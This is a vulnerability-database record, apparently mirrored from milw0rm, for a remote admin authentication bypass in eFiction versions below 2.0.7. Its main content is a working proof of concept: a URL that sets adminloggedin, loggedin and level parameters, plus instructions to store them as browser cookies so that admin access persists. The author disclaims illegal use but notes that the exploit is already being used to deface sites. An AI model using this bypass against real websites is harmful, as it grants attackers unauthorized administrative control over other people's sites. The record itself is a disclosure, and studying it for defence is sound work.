{"lastseen": "2017-11-19T15:43:13", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "href": "https://www.seebug.org/vuldb/ssvid-63888", "references": [], "enchantments_done": [], "id": "SSV:63888", "title": "eFiction < 2.0.7 - Remote Admin Authentication Bypass Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 6, "sourceData": "\n ##########################################\r\n# eFiction vulnerability\r\n##########################################\r\n# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing \r\nthese websites under MY name, which is a shame because they ripped it from a private discussion \r\non g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone, \r\nnor act in this type of activity. I suggest whomever is defacing websites under my name stop, \r\nsince you would gain more notorioty under your own name.\r\n##########################################\r\n\r\nhttp://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1\r\n\r\nUse firefox's extension "add n edit cookies" to add these to your cookies so they stick. \r\n(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays with each page)\r\n\r\n# milw0rm.com [2006-08-25]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-63888", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645221744}}
eFiction < 2.0.7 - Remote Admin Authentication Bypass Vulnerability